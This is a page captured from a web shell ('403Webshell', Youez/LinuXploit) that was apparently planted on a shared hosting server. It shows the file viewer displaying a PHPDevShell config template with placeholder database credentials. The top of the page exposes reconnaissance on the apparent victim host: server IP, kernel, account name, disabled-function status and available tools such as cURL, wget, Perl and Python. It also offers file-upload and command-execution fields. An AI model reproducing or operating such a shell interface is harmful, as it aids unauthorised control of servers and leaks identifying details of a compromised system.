403Webshell
Server IP : 162.253.224.18  /  Your IP : 216.73.216.52
Web Server : Apache
System : Linux s18.infinitysrv.com 3.10.0-962.3.2.lve1.5.89.el7.x86_64 #1 SMP Thu Jul 9 15:55:31 UTC 2026 x86_64
User : dejavumk ( 1184)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/softaculous/phpdevshell/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/softaculous/phpdevshell/single-site.config.php
<?php

//////////////////////////////////////////////////////////////////////////////////////////
// Mandatory Settings, these settings must be changed for the system to work correctly. //
//////////////////////////////////////////////////////////////////////////////////////////

$master = $configuration['master_database'];

/**
 * Database details.
 * MySQL database name.
 * @global string
 */
$configuration[$master]['database'] = '[[softdb]]';
/**
 * Database details.
 * MySQL database username.
 * @global string
 */
$configuration[$master]['username'] = '[[softdbuser]]';
/**
 * Database details.
 * MySQL database password.
 * @global string
 */
$configuration[$master]['password'] = '[[softdbpass]]';

// NONE MANDATORY.
// You might want to consider changing these setting while you are developing.
// IT IS VERY IMPORTANT TO SWITCH THEM TO SAFE SETTING WHEN GOING INTO PRODUCTION.
// Use settings from PHPDS-defaults.config.php to extend this file and override defaults.
/////////////////////////////////////////////////////////////////////////////////////////
/**
 * When your system goes to production, set this to TRUE to avoid informations leaks.
 * Will force compile on template engine.
 *
 * Overrides most 'debug' and 'error' settings
 * 
 * PS: IT WONT SHOW NOTICES OR GENERAL ERRORS IF THIS IS TRUE.
 *
 * @var boolean
 */
$configuration['production'] = false;
/**
 * To what email should critical errors be emailed to, make sure php can send mail, this does not use the PHPDevShell mailing engine.
 *
 * @global string
 */
$configuration['error']['email_critical'] = '[[admin_email]]';

Youez - 2016 - github.com/yon3zu
LinuXploit